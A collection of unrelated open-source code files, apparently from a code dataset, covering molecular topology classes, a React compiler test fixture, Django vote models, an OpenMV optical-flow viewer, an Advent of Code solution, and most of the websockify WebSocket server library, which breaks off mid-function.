"""
# this could be made faster by caching the list
# of atoms internally if necessary
return next(itertools.islice(self.atoms, index, index+1))
@property
def n_atoms(self):
"""Get the number of atoms in this Chain"""
return sum(r.n_atoms for r in self._residues)
class Residue(object):
"""A Residue object represents a residue within a Topology.
Attributes
----------
name : str
The name of the Residue
index : int
The index of the Residue within its Topology
chain : int
The residue sequence number
"""
def __init__(self, name, index, chain, resSeq):
"""Construct a new Residue. You should call add_residue()
on the Topology instead of calling this directly."""
self.name = name
self.index = index
self.chain = chain
self.resSeq = resSeq
self._atoms = []
@property
def atoms(self):
"""Iterator over all Atoms in the Residue.
Returns
-------
atomiter : listiterator
Iterator over all Atoms in the Residue.
"""
return iter(self._atoms)
def atom(self, index):
"""Get a specific atom in this Residue.
Returns
-------
atom : Atom
"""
return self._atoms[index]
@property
def n_atoms(self):
"""Get the number of atoms in this Residue"""
return len(self._atoms)
def __str__(self):
return '%s%s' % (self.name, self.resSeq)
class Atom(object):
"""An Atom object represents a residue within a Topology.
Attributes
----------
name : str
The name of the Atom
element : mdtraj.element.Element
The element of the Atoms
index : int
The index of the Atom within its Topology
residue : mdtraj.topology.Residue
The Residue this Atom belongs to
"""
def __init__(self, name, element, index, residue):
"""Construct a new Atom. You should call add_atom() on the Topology instead of calling this directly."""
## The name of the Atom
self.name = name
## That Atom's element
self.element = element
## The index of the Atom within its Topology
self.index = index
## The Residue this Atom belongs to
self.residue = residue
def __eq__(self, other):
""" Check whether two Atom objects are equal. """
if self.name != other.name:
return False
if self.index != other.index:
return False
if self.element.name != other.element.name:
return False
if self.residue.name != other.residue.name:
return False
if self.residue.index != other.residue.index:
return False
if self.residue.chain.index != other.residue.chain.index:
return False
return True
def __hash__(self):
""" A quick comparison. """
return self.index
def __str__(self):
return '%s-%s' % (self.residue, self.name) | unknown | codeparrot/codeparrot-clean | ||
## Input
```javascript
// @enableTreatFunctionDepsAsConditional
function Component(props) {
function getLength() {
return props.bar.length;
}
return props.bar && getLength();
}
export const FIXTURE_ENTRYPOINT = {
fn: Component,
params: [{bar: null}],
};
```
## Code
```javascript
import { c as _c } from "react/compiler-runtime"; // @enableTreatFunctionDepsAsConditional
function Component(props) {
const $ = _c(5);
let t0;
if ($[0] !== props.bar) {
t0 = function getLength() {
return props.bar.length;
};
$[0] = props.bar;
$[1] = t0;
} else {
t0 = $[1];
}
const getLength = t0;
let t1;
if ($[2] !== getLength || $[3] !== props.bar) {
t1 = props.bar && getLength();
$[2] = getLength;
$[3] = props.bar;
$[4] = t1;
} else {
t1 = $[4];
}
return t1;
}
export const FIXTURE_ENTRYPOINT = {
fn: Component,
params: [{ bar: null }],
};
```
### Eval output
(kind: ok) null | unknown | github | https://github.com/facebook/react | compiler/packages/babel-plugin-react-compiler/src/__tests__/fixtures/compiler/functionexpr–conditional-access.expect.md |
from django.db import models
from djorm_pgarray.fields import ArrayField
from .base import OCDBase, LinkBase, OCDIDField, RelatedBase
from .people_orgs import Organization, Person
from .jurisdiction import LegislativeSession
from .bill import Bill
from .. import common
class VoteEvent(OCDBase):
id = OCDIDField(ocd_type='vote')
identifier = models.CharField(max_length=300, blank=True)
motion_text = models.TextField()
motion_classification = ArrayField(dbtype="text") # enum
start_date = models.CharField(max_length=19) # YYYY-MM-DD HH:MM:SS
end_date = models.CharField(max_length=19, blank=True) # YYYY-MM-DD
result = models.CharField(max_length=50, choices=common.VOTE_RESULT_CHOICES)
organization = models.ForeignKey(Organization, related_name='votes')
legislative_session = models.ForeignKey(LegislativeSession, related_name='votes')
bill = models.ForeignKey(Bill, related_name='votes', null=True)
def __str__(self):
if self.identifier:
return '{} in {}'.format(self.identifier, self.legislative_session)
else:
return '{} on {}'.format(self.motion_text, self.bill)
class Meta:
index_together = [
['legislative_session', 'identifier', 'bill'],
['legislative_session', 'bill']
]
class VoteCount(RelatedBase):
vote = models.ForeignKey(VoteEvent, related_name='counts')
option = models.CharField(max_length=50, choices=common.VOTE_OPTION_CHOICES)
value = models.PositiveIntegerField()
class PersonVote(RelatedBase):
vote = models.ForeignKey(VoteEvent, related_name='votes')
option = models.CharField(max_length=50, choices=common.VOTE_OPTION_CHOICES)
voter_name = models.CharField(max_length=300)
voter = models.ForeignKey(Person, related_name='votes', null=True)
note = models.TextField(blank=True)
class VoteSource(LinkBase):
vote_event = models.ForeignKey(VoteEvent, related_name='sources') | unknown | codeparrot/codeparrot-clean | ||
#!/usr/bin/env python2
# This file is part of the OpenMV project.
#
# Copyright (c) 2013-2021 Ibrahim Abdelkader <iabdalkader@openmv.io>
# Copyright (c) 2013-2021 Kwabena W. Agyeman <kwagyeman@openmv.io>
#
# This work is licensed under the MIT license, see the file LICENSE for details.
#
# pygame + sockets util that receives optical flow data from the camera and draws a path.
import time
import select
import socket
import pygame
from math import sqrt, isnan
RED = (255,0,0)
GREEN = (0,255,0)
BLUE = (0,0,255)
WHITE = (255,255,255)
BLACK = (0,0,0)
PINK = (255,200,200)
ADDR =('192.168.1.101', 8080)
WIDTH = 640
HEIGHT = 480
points = []
clock = pygame.time.Clock()
screen = pygame.display.set_mode((WIDTH, HEIGHT))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(ADDR)
lx = WIDTH//2
ly = HEIGHT//2
while True:
msElapsed = clock.tick(30)
event = pygame.event.poll()
if event.type == pygame.QUIT:
break
elif event.type == pygame.KEYDOWN:
if event.key == pygame.K_SPACE:
# Reset points
points = []
lx = WIDTH//2
ly = HEIGHT//2
data = s.recv(20)
print(data)
dx = float(data.split(',')[0])
dy = float(data.split(',')[1])
r = float(data.split(',')[2])
if dx and dy and r > 0.15:
m = sqrt(dx*dx + dy*dy)
x2 = lx + int((dx/m)*5)
y2 = ly - int((dy/m)*5)
lx = x2; ly = y2
points.append((x2, y2))
if len(points)>1:
screen.fill(WHITE)
pygame.draw.lines(screen, RED, False, points, 3)
pygame.display.update()
s.close()
pygame.quit() | unknown | codeparrot/codeparrot-clean | ||
"""
from: http://adventofcode.com/2017/day/5
--- Day 5: A Maze of Twisty Trampolines, All Alike ---
An urgent interrupt arrives from the CPU: it's trapped in a maze of jump instructions, and it would
like assistance from any programs with spare cycles to help find the exit.
The message includes a list of the offsets for each jump. Jumps are relative: -1 moves to the
previous instruction, and 2 skips the next one. Start at the first instruction in the list. The goal
is to follow the jumps until one leads outside the list.
In addition, these instructions are a little strange; after each jump, the offset of that
instruction increases by 1. So, if you come across an offset of 3, you would move three instructions
forward, but change it to a 4 for the next time it is encountered.
For example, consider the following list of jump offsets:
0
3
0
1
-3
Positive jumps ("forward") move downward; negative jumps move upward. For legibility in this
example, these offset values will be written all on one line, with the current instruction marked in
parentheses. The following steps would be taken before an exit is found:
(0) 3 0 1 -3 - before we have taken any steps.
(1) 3 0 1 -3 - jump with offset 0 (that is, don't jump at all). Fortunately, the instruction is
then incremented to 1.
2 (3) 0 1 -3 - step forward because of the instruction we just modified. The first instruction
is incremented again, now to 2.
2 4 0 1 (-3) - jump all the way to the end; leave a 4 behind.
2 (4) 0 1 -2 - go back to where we just were; increment -3 to -2.
2 5 0 1 -2 - jump 4 steps forward, escaping the maze.
In this example, the exit is reached in 5 steps.
How many steps does it take to reach the exit?
"""
def main():
"""Solve the problem!"""
maze = []
jump_count = 0
# import the maze
with open("input.txt") as input_file:
for line in input_file:
maze.append(int(line))
index = 0
while index < len(maze):
jump_value = maze[index]
maze[index] = maze[index] + 1
index = index + jump_value
jump_count = jump_count + 1
print(jump_count)
if __name__ == "__main__":
main() | unknown | codeparrot/codeparrot-clean | ||
#!/usr/bin/env python
'''
Python WebSocket library with support for "wss://" encryption.
Copyright 2011 Joel Martin
Licensed under LGPL version 3 (see docs/LICENSE.LGPL-3)
Supports following protocol versions:
- http://tools.ietf.org/html/draft-ietf-hybi-thewebsocketprotocol-07
- http://tools.ietf.org/html/draft-ietf-hybi-thewebsocketprotocol-10
- http://tools.ietf.org/html/rfc6455
You can make a cert/key with openssl using:
openssl req -new -x509 -days 365 -nodes -out self.pem -keyout self.pem
as taken from http://docs.python.org/dev/library/ssl.html#certificates
'''
import os, sys, time, errno, signal, socket, select, logging
import array, struct
from base64 import b64encode, b64decode
# Imports that vary by python version
# python 3.0 differences
if sys.hexversion > 0x3000000:
b2s = lambda buf: buf.decode('latin_1')
s2b = lambda s: s.encode('latin_1')
s2a = lambda s: s
else:
b2s = lambda buf: buf # No-op
s2b = lambda s: s # No-op
s2a = lambda s: [ord(c) for c in s]
try: from io import StringIO
except: from cStringIO import StringIO
try: from http.server import SimpleHTTPRequestHandler
except: from SimpleHTTPServer import SimpleHTTPRequestHandler
# python 2.6 differences
try: from hashlib import sha1
except: from sha import sha as sha1
# python 2.5 differences
try:
from struct import pack, unpack_from
except:
from struct import pack
def unpack_from(fmt, buf, offset=0):
slice = buffer(buf, offset, struct.calcsize(fmt))
return struct.unpack(fmt, slice)
# Degraded functionality if these imports are missing
for mod, msg in [('numpy', 'HyBi protocol will be slower'),
('ssl', 'TLS/SSL/wss is disabled'),
('multiprocessing', 'Multi-Processing is disabled'),
('resource', 'daemonizing is disabled')]:
try:
globals()[mod] = __import__(mod)
except ImportError:
globals()[mod] = None
print("WARNING: no '%s' module, %s" % (mod, msg))
if multiprocessing and sys.platform == 'win32':
# make sockets pickle-able/inheritable
import multiprocessing.reduction
# HTTP handler with WebSocket upgrade support
class WebSocketRequestHandler(SimpleHTTPRequestHandler):
"""
WebSocket Request Handler Class, derived from SimpleHTTPRequestHandler.
Must be sub-classed with new_websocket_client method definition.
The request handler can be configured by setting optional
attributes on the server object:
* only_upgrade: If true, SimpleHTTPRequestHandler will not be enabled,
only websocket is allowed.
* verbose: If true, verbose logging is activated.
* daemon: Running as daemon, do not write to console etc
* record: Record raw frame data as JavaScript array into specified filename
* run_once: Handle a single request
* handler_id: A sequence number for this connection, appended to record filename
"""
buffer_size = 65536
GUID = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"
server_version = "WebSockify"
protocol_version = "HTTP/1.1"
# An exception while the WebSocket client was connected
class CClose(Exception):
pass
def __init__(self, req, addr, server):
# Retrieve a few configuration variables from the server
self.only_upgrade = getattr(server, "only_upgrade", False)
self.verbose = getattr(server, "verbose", False)
self.daemon = getattr(server, "daemon", False)
self.record = getattr(server, "record", False)
self.run_once = getattr(server, "run_once", False)
self.rec = None
self.handler_id = getattr(server, "handler_id", False)
self.file_only = getattr(server, "file_only", False)
self.traffic = getattr(server, "traffic", False)
self.logger = getattr(server, "logger", None)
if self.logger is None:
self.logger = WebSocketServer.get_logger()
SimpleHTTPRequestHandler.__init__(self, req, addr, server)
@staticmethod
def unmask(buf, hlen, plen):
pstart = hlen + 4
pend = pstart + plen
if numpy:
b = c = s2b('')
if plen >= 4:
mask = numpy.frombuffer(buf, dtype=numpy.dtype('<u4'),
offset=hlen, count=1)
data = numpy.frombuffer(buf, dtype=numpy.dtype('<u4'),
offset=pstart, count=int(plen / 4))
#b = numpy.bitwise_xor(data, mask).data
b = numpy.bitwise_xor(data, mask).tostring()
if plen % 4:
#self.msg("Partial unmask")
mask = numpy.frombuffer(buf, dtype=numpy.dtype('B'),
offset=hlen, count=(plen % 4))
data = numpy.frombuffer(buf, dtype=numpy.dtype('B'),
offset=pend - (plen % 4),
count=(plen % 4))
c = numpy.bitwise_xor(data, mask).tostring()
return b + c
else:
# Slower fallback
mask = buf[hlen:hlen+4]
data = array.array('B')
mask = s2a(mask)
data.fromstring(buf[pstart:pend])
for i in range(len(data)):
data[i] ^= mask[i % 4]
return data.tostring()
@staticmethod
def encode_hybi(buf, opcode, base64=False):
""" Encode a HyBi style WebSocket frame.
Optional opcode:
0x0 - continuation
0x1 - text frame (base64 encode buf)
0x2 - binary frame (use raw buf)
0x8 - connection close
0x9 - ping
0xA - pong
"""
if base64:
buf = b64encode(buf)
b1 = 0x80 | (opcode & 0x0f) # FIN + opcode
payload_len = len(buf)
if payload_len <= 125:
header = pack('>BB', b1, payload_len)
elif payload_len > 125 and payload_len < 65536:
header = pack('>BBH', b1, 126, payload_len)
elif payload_len >= 65536:
header = pack('>BBQ', b1, 127, payload_len)
#self.msg("Encoded: %s", repr(header + buf))
return header + buf, len(header), 0
@staticmethod
def decode_hybi(buf, base64=False, logger=None):
""" Decode HyBi style WebSocket packets.
Returns:
{'fin' : 0_or_1,
'opcode' : number,
'masked' : boolean,
'hlen' : header_bytes_number,
'length' : payload_bytes_number,
'payload' : decoded_buffer,
'left' : bytes_left_number,
'close_code' : number,
'close_reason' : string}
"""
f = {'fin' : 0,
'opcode' : 0,
'masked' : False,
'hlen' : 2,
'length' : 0,
'payload' : None,
'left' : 0,
'close_code' : 1000,
'close_reason' : ''}
if logger is None:
logger = WebSocketServer.get_logger()
blen = len(buf)
f['left'] = blen
if blen < f['hlen']:
return f # Incomplete frame header
b1, b2 = unpack_from(">BB", buf)
f['opcode'] = b1 & 0x0f
f['fin'] = (b1 & 0x80) >> 7
f['masked'] = (b2 & 0x80) >> 7
f['length'] = b2 & 0x7f
if f['length'] == 126:
f['hlen'] = 4
if blen < f['hlen']:
return f # Incomplete frame header
(f['length'],) = unpack_from('>xxH', buf)
elif f['length'] == 127:
f['hlen'] = 10
if blen < f['hlen']:
return f # Incomplete frame header
(f['length'],) = unpack_from('>xxQ', buf)
full_len = f['hlen'] + f['masked'] * 4 + f['length']
if blen < full_len: # Incomplete frame
return f # Incomplete frame header
# Number of bytes that are part of the next frame(s)
f['left'] = blen - full_len
# Process 1 frame
if f['masked']:
# unmask payload
f['payload'] = WebSocketRequestHandler.unmask(buf, f['hlen'],
f['length'])
else:
logger.debug("Unmasked frame: %s" % repr(buf))
f['payload'] = buf[(f['hlen'] + f['masked'] * 4):full_len]
if base64 and f['opcode'] in [1, 2]:
try:
f['payload'] = b64decode(f['payload'])
except:
logger.exception("Exception while b64decoding buffer: %s" %
(repr(buf)))
raise
if f['opcode'] == 0x08:
if f['length'] >= 2:
f['close_code'] = unpack_from(">H", f['payload'])[0]
if f['length'] > 3:
f['close_reason'] = f['payload'][2:]
return f
#
# WebSocketRequestHandler logging/output functions
#
def print_traffic(self, token="."):
""" Show traffic flow mode. """
if self.traffic:
sys.stdout.write(token)
sys.stdout.flush()
def msg(self, msg, *args, **kwargs):
""" Output message with handler_id prefix. """
prefix = "% 3d: " % self.handler_id
self.logger.log(logging.INFO, "%s%s" % (prefix, msg), *args, **kwargs)
def vmsg(self, msg, *args, **kwargs):
""" Same as msg() but as debug. """
prefix = "% 3d: " % self.handler_id
self.logger.log(logging.DEBUG, "%s%s" % (prefix, msg), *args, **kwargs)
def warn(self, msg, *args, **kwargs):
""" Same as msg() but as warning. """
prefix = "% 3d: " % self.handler_id
self.logger.log(logging.WARN, "%s%s" % (prefix, msg), *args, **kwargs)
#
# Main WebSocketRequestHandler methods
#
def send_frames(self, bufs=None):
""" Encode and send WebSocket frames. Any frames already
queued will be sent first. If buf is not set then only queued
frames will be sent. Returns the number of pending frames that
could not be fully sent. If returned pending frames is greater
than 0, then the caller should call again when the socket is
ready. """
tdelta = int(time.time()*1000) - self.start_time
if bufs:
for buf in bufs:
if self.base64:
encbuf, lenhead, lentail = self.encode_hybi(buf, opcode=1, base64=True)
else:
encbuf, lenhead, lentail = self.encode_hybi(buf, opcode=2, base64=False)
if self.rec:
self.rec.write("%s,\n" %
repr("{%s{" % tdelta
+ encbuf[lenhead:len(encbuf)-lentail]))
self.send_parts.append(encbuf)
while self.send_parts:
# Send pending frames
buf = self.send_parts.pop(0)
sent = self.request.send(buf)
if sent == len(buf):
self.print_traffic("<")
else:
self.print_traffic("<.")
self.send_parts.insert(0, buf[sent:])
break
return len(self.send_parts)
def recv_frames(self):
""" Receive and decode WebSocket frames.
Returns:
(bufs_list, closed_string)
"""
closed = False
bufs = []
tdelta = int(time.time()*1000) - self.start_time
buf = self.request.recv(self.buffer_size)
if len(buf) == 0:
closed = {'code': 1000, 'reason': "Client closed abruptly"}
return bufs, closed
if self.recv_part:
# Add partially received frames to current read buffer
buf = self.recv_part + buf
self.recv_part = None
while buf:
frame = self.decode_hybi(buf, base64=self.base64,
logger=self.logger)
#self.msg("Received buf: %s, frame: %s", repr(buf), frame)
if frame['payload'] == None:
# Incomplete/partial frame
self.print_traffic("}.")
if frame['left'] > 0:
self.recv_part = buf[-frame['left']:]
break
else:
if frame['opcode'] == 0x8: # connection close
closed = {'code': frame['close_code'],
'reason': frame['close_reason']}
break
self.print_traffic("}")
if self.rec:
start = frame['hlen']
end = frame['hlen'] + frame['length']
if frame['masked']:
recbuf = WebSocketRequestHandler.unmask(buf, frame['hlen'],
frame['length'])
else:
recbuf = buf[frame['hlen']:frame['hlen'] +
frame['length']]
self.rec.write("%s,\n" %
repr("}%s}" % tdelta + recbuf))
bufs.append(frame['payload'])
if frame['left']:
buf = buf[-frame['left']:]
else:
buf = ''
return bufs, closed
def send_close(self, code=1000, reason=''):
""" Send a WebSocket orderly close frame. """
msg = pack(">H%ds" % len(reason), code, reason)
buf, h, t = self.encode_hybi(msg, opcode=0x08, base64=False)
self.request.send(buf)
def do_websocket_handshake(self):
h = self.headers
prot = 'WebSocket-Protocol'
protocols = h.get('Sec-'+prot, h.get(prot, '')).split(',')
ver = h.get('Sec-WebSocket-Version')
if ver:
# HyBi/IETF version of the protocol
# HyBi-07 report version 7
# HyBi-08 - HyBi-12 report version 8
# HyBi-13 reports version 13
if ver in ['7', '8', '13']:
self.version = "hybi-%02d" % int(ver)
else:
self.send_error(400, "Unsupported protocol version %s" % ver)
return False
key = h['Sec-WebSocket-Key']
# Choose binary if client supports it
if 'binary' in protocols:
self.base64 = False
elif 'base64' in protocols:
self.base64 = True
else:
self.send_error(400, "Client must support 'binary' or 'base64' protocol")
return False
# Generate the hash value for the accept header
accept = b64encode(sha1(s2b(key + self.GUID)).digest())
self.send_response(101, "Switching Protocols")
self.send_header("Upgrade", "websocket")
self.send_header("Connection", "Upgrade")
self.send_header("Sec-WebSocket-Accept", b2s(accept))
if self.base64:
self.send_header("Sec-WebSocket-Protocol", "base64")
else:
self.send_header("Sec-WebSocket-Protocol", "binary")
self.end_headers()
return True
else:
self.send_error(400, "Missing Sec-WebSocket-Version header. Hixie protocols not supported.")
return False
def handle_websocket(self):
"""Upgrade a connection to Websocket, if requested. If this succeeds,
new_websocket_client() will be called. Otherwise, False is returned.
"""
if (self.headers.get('upgrade') and
self.headers.get('upgrade').lower() == 'websocket'):
if not self.do_websocket_handshake():
return False
# Indicate to server that a Websocket upgrade was done
self.server.ws_connection = True
# Initialize per client settings
self.send_parts = []
self.recv_part = None
self.start_time = int(time.time()*1000)
# client_address is empty with, say, UNIX domain sockets
client_addr = ""
is_ssl = False
try:
client_addr = self.client_address[0]
is_ssl = self.client_address[2]
except IndexError:
pass
if is_ssl:
self.stype = "SSL/TLS (wss://)"
else:
self.stype = "Plain non-SSL (ws://)"
self.log_message("%s: %s WebSocket connection", client_addr,
self.stype)
self.log_message("%s: Version %s, base64: '%s'", client_addr,
self.version, self.base64)
if self.path != '/':
self.log_message("%s: Path: '%s'", client_addr, self.path)
if self.record:
# Record raw frame data as JavaScript array
fname = "%s.%s" % (self.record,
self.handler_id)
self.log_message("opening record file: %s", fname)
self.rec = open(fname, 'w+')
encoding = "binary"
if self.base64: encoding = "base64"
self.rec.write("var VNC_frame_encoding = '%s';\n"
% encoding)
self.rec.write("var VNC_frame_data = [\n")
try:
self.new_websocket_client()
except self.CClose:
# Close the client
_, exc, _ = sys.exc_info()
self.send_close(exc.args[0], exc.args[1])
return True
else:
return False
def do_GET(self):
"""Handle GET request. Calls handle_websocket(). If unsuccessful,
and web server is enabled, SimpleHTTPRequestHandler.do_GET will be called."""
if not self.handle_websocket():
if self.only_upgrade:
self.send_error(405, "Method Not Allowed")
else:
SimpleHTTPRequestHandler.do_GET(self)
def list_directory(self, path):
if self.file_only:
self.send_error(404, "No such file")
else:
return SimpleHTTPRequestHandler.list_directory(self, path)
def new_websocket_client(self):
""" Do something with a WebSockets client connection. """
raise Exception("WebSocketRequestHandler.new_websocket_client() must be overloaded")
def do_HEAD(self):
if self.only_upgrade:
self.send_error(405, "Method Not Allowed")
else:
SimpleHTTPRequestHandler.do_HEAD(self)
def finish(self):
if self.rec:
self.rec.write("'EOF'];\n")
self.rec.close()
def handle(self):
# When using run_once, we have a single process, so
# we cannot loop in BaseHTTPRequestHandler.handle; we
# must return and handle new connections
if self.run_once:
self.handle_one_request()
else:
SimpleHTTPRequestHandler.handle(self)
def log_request(self, code='-', size='-'):
if self.verbose:
SimpleHTTPRequestHandler.log_request(self, code, size)
class WebSocketServer(object):
"""
WebSockets server class.
As an alternative, the standard library SocketServer can be used
"""
policy_response = """<cross-domain-policy><allow-access-from domain="*" to-ports="*" /></cross-domain-policy>\n"""
log_prefix = "websocket"
# An exception before the WebSocket connection was established
class EClose(Exception):
pass
class Terminate(Exception):
pass
def __init__(self, RequestHandlerClass, listen_host='',
listen_port=None, source_is_ipv6=False,
verbose=False, cert='', key='', ssl_only=None,
daemon=False, record='', web='',
file_only=False,
run_once=False, timeout=0, idle_timeout=0, traffic=False,
tcp_keepalive=True, tcp_keepcnt=None, tcp_keepidle=None,
tcp_keepintvl=None):
# settings
self.RequestHandlerClass = RequestHandlerClass
self.verbose = verbose
self.listen_host = listen_host
self.listen_port = listen_port
self.prefer_ipv6 = source_is_ipv6
self.ssl_only = ssl_only
self.daemon = daemon
self.run_once = run_once
self.timeout = timeout
self.idle_timeout = idle_timeout
self.traffic = traffic
self.launch_time = time.time()
self.ws_connection = False
self.handler_id = 1
self.logger = self.get_logger()
self.tcp_keepalive = tcp_keepalive
self.tcp_keepcnt = tcp_keepcnt
self.tcp_keepidle = tcp_keepidle
self.tcp_keepintvl = tcp_keepintvl
# Make paths settings absolute
self.cert = os.path.abspath(cert)
self.key = self.web = self.record = ''
if key:
self.key = os.path.abspath(key)
if web:
self.web = os.path.abspath(web)
if record:
self.record = os.path.abspath(record)
if self.web:
os.chdir(self.web)
self.only_upgrade = not self.web
# Sanity checks
if not ssl and self.ssl_only:
raise Exception("No 'ssl' module and SSL-only specified")
if self.daemon and not resource:
raise Exception("Module 'resource' required to daemonize")
# Show configuration
self.msg("WebSocket server settings:")
self.msg(" - Listen on %s:%s",
self.listen_host, self.listen_port)
self.msg(" - Flash security policy server")
if self.web:
self.msg(" - Web server. Web root: %s", self.web)
if ssl:
if os.path.exists(self.cert):
self.msg(" - SSL/TLS support")
if self.ssl_only:
self.msg(" - Deny non-SSL/TLS connections")
else:
self.msg(" - No SSL/TLS support (no cert file)")
else:
self.msg(" - No SSL/TLS support (no 'ssl' module)")
if self.daemon:
self.msg(" - Backgrounding (daemon)")
if self.record:
self.msg(" - Recording to '%s.*'", self.record)
#
# WebSocketServer static methods
#
@staticmethod
def get_logger():
return logging.getLogger("%s.%s" % (
WebSocketServer.log_prefix,
WebSocketServer.__class__.__name__))
@staticmethod
def socket(host, port=None, connect=False, prefer_ipv6=False,
unix_socket=None, use_ssl=False, tcp_keepalive=True,
tcp_keepcnt=None, tcp_keepidle=None, tcp_keepintvl=None):
""" Resolve a host (and optional port) to an IPv4 or IPv6
address. Create a socket. Bind to it if listen is set,
otherwise connect to it. Return the socket.
"""
flags = 0
if host == '':
host = None
if connect and not (port or unix_socket):
raise Exception("Connect mode requires a port")
if use_ssl and not ssl:
raise Exception("SSL socket requested but Python SSL module not loaded.");
if not connect and use_ssl:
raise Exception("SSL only supported in connect mode (for now)")
if not connect:
flags = flags | socket.AI_PASSIVE
if not unix_socket:
addrs = socket.getaddrinfo(host, port, 0, socket.SOCK_STREAM,
socket.IPPROTO_TCP, flags)
if not addrs:
raise Exception("Could not resolve host '%s'" % host)
addrs.sort(key=lambda x: x[0])
if prefer_ipv6:
addrs.reverse()
sock = socket.socket(addrs[0][0], addrs[0][1])
if tcp_keepalive:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
if tcp_keepcnt:
sock.setsockopt(socket.SOL_TCP, socket.TCP_KEEPCNT,
tcp_keepcnt)
if tcp_keepidle:
sock.setsockopt(socket.SOL_TCP, socket.TCP_KEEPIDLE,
tcp_keepidle)
if tcp_keepintvl:
sock.setsockopt(socket.SOL_TCP, socket.TCP_KEEPINTVL,
tcp_keepintvl)
if connect:
sock.connect(addrs[0][4])
if use_ssl:
sock = ssl.wrap_socket(sock)
else:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(addrs[0][4])
sock.listen(100)
else:
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
sock.connect(unix_socket)
return sock
@staticmethod
def daemonize(keepfd=None, chdir='/'):
os.umask(0)
if chdir:
os.chdir(chdir)
else:
os.chdir('/')
os.setgid(os.getgid()) # relinquish elevations
os.setuid(os.getuid()) # relinquish elevations
# Double fork to daemonize
if os.fork() > 0: os._exit(0) # Parent exits
os.setsid() # Obtain new process group
if os.fork() > 0: os._exit(0) # Parent exits
# Signal handling
signal.signal(signal.SIGTERM, signal.SIG_IGN)
signal.signal(signal.SIGINT, signal.SIG_IGN)
# Close open files
maxfd = resource.getrlimit(resource.RLIMIT_NOFILE)[1]
if maxfd == resource.RLIM_INFINITY: maxfd = 256
for fd in reversed(range(maxfd)):
try:
if fd != keepfd:
os.close(fd)
except OSError:
_, exc, _ = sys.exc_info()
if exc.errno != errno.EBADF: raise
# Redirect I/O to /dev/null
os.dup2(os.open(os.devnull, os.O_RDWR), sys.stdin.fileno())
os.dup2(os.open(os.devnull, os.O_RDWR), sys.stdout.fileno())
os.dup2(os.open(os.devnull, os.O_RDWR), sys.stderr.fileno())
def do_handshake(self, sock, address):
"""
do_handshake does the following:
- Peek at the first few bytes from the socket.
- If the connection is Flash policy request then answer it,
close the socket and return.
- If the connection is an HTTPS/SSL/TLS connection then SSL
wrap the socket.
- Read from the (possibly wrapped) socket.
- If we have received a HTTP GET request and the webserver
functionality is enabled, answer it, close the socket and
return.
- Assume we have a WebSockets connection, parse the client
handshake data.
- Send a WebSockets handshake server response.
- Return the socket for this WebSocket client.
"""
ready = select.select([sock], [], [], 3)[0]
if not ready:
raise self.EClose("ignoring socket not ready")
# Peek, but do not read the data so that we have a opportunity
# to SSL wrap the socket first
handshake = sock.recv(1024, socket.MSG_PEEK)
#self.msg("Handshake [%s]" % handshake)
if handshake == "":
raise self.EClose("ignoring empty handshake")
elif handshake.startswith(s2b("<policy-file-request/>")):
# Answer Flash policy request
handshake = sock.recv(1024)
sock.send(s2b(self.policy_response))
raise self.EClose("Sending flash policy response")
elif handshake[0] in ("\x16", "\x80", 22, 128):
# SSL wrap the connection
if not ssl:
raise self.EClose("SSL connection but no 'ssl' module")
if not os.path.exists(self.cert):
raise self.EClose("SSL connection but '%s' not found"
% self.cert)
retsock = None
try:
retsock = ssl.wrap_socket(
sock,
server_side=True,
certfile=self.cert,
keyfile=self.key)
except ssl.SSLError:
_, x, _ = sys.exc_info()
if x.args[0] == ssl.SSL_ERROR_EOF:
if len(x.args) > 1:
raise self.EClose(x.args[1])
else:
raise self.EClose("Got SSL_ERROR_EOF")
else:
raise
elif self.ssl_only:
raise self.EClose("non-SSL connection received but disallowed")
else:
retsock = sock
# If the address is like (host, port), we are extending it
# with a flag indicating SSL. Not many other options
# available...
if len(address) == 2:
address = (address[0], address[1], (retsock != sock))
self.RequestHandlerClass(retsock, address, self)
# Return the WebSockets socket which may be SSL wrapped
return retsock
#
# WebSocketServer logging/output functions
#
def msg(self, *args, **kwargs):
""" Output message as info """
self.logger.log(logging.INFO, *args, **kwargs)
def vmsg(self, *args, **kwargs):
""" Same as msg() but as debug. """
self.logger.log(logging.DEBUG, *args, **kwargs)
def warn(self, *args, **kwargs):
""" Same as msg() but as warning. """
self.logger.log(logging.WARN, *args, **kwargs)
#
# Events that can/should be overridden in sub-classes
#
def started(self):
""" Called after WebSockets startup """
self.vmsg("WebSockets server started")
def poll(self):
""" Run periodically while waiting for connections. """
#self.vmsg("Running poll()")
pass
def terminate(self):
raise self.Terminate()
def multiprocessing_SIGCHLD(self, sig, stack):
self.vmsg('Reaing zombies, active child count is %s', len(multiprocessing.active_children()))
def fallback_SIGCHLD(self, sig, stack):
# Reap zombies when using os.fork() (python 2.4)
self.vmsg("Got SIGCHLD, reaping zombies")
try:
result = os.waitpid(-1, os.WNOHANG)
while result[0]:
self.vmsg("Reaped child process %s" % result[0])
result = os.waitpid(-1, os.WNOHANG)
except (OSError):
pass
def do_SIGINT(self, sig, stack):
self.msg("Got SIGINT, exiting")
self.terminate()
def do_SIGTERM(self, sig, stack):
self.msg("Got SIGTERM, exiting")
self.terminate()
def top_new_client(self, startsock, address):
""" Do something with a WebSockets client connection. """
# handler process
client = None
try:
try:
client = self.do_handshake(startsock, address)
except self.EClose:
_, exc, _ = sys.exc_info()
# Connection was not a WebSockets connection
if exc.args[0]:
self.msg("%s: %s" % (address[0], exc.args[0]))
except WebSocketServer.Terminate:
raise
except Exception:
_, exc, _ = sys.exc_info()
self.msg("handler exception: %s" % str(exc))
self.vmsg("exception", exc_info=True)
finally:
if client and client != startsock:
# Close the SSL wrapped socket
# Original socket closed by caller
client.close()
def start_server(self):
"""
Daemonize if requested. Listen for for connections. Run
do_handshake() method for each connection. If the connection
is a WebSockets client then call new_websocket_client() method (which must
be overridden) for each new client connection.
"""
lsock = self.socket(self.listen_host, self.listen_port, False,
self.prefer_ipv6,
tcp_keepalive=self.tcp_keepalive,
tcp_keepcnt=self.tcp_keepcnt,
tcp_keepidle=self.tcp_keepidle,
tcp_keepintvl=self.tcp_keepintvl)
if self.daemon:
self.daemonize(keepfd=lsock.fileno(), chdir=self.web)
self.started() # Some things need to happen after daemonizing
# Allow override of signals
original_signals = {
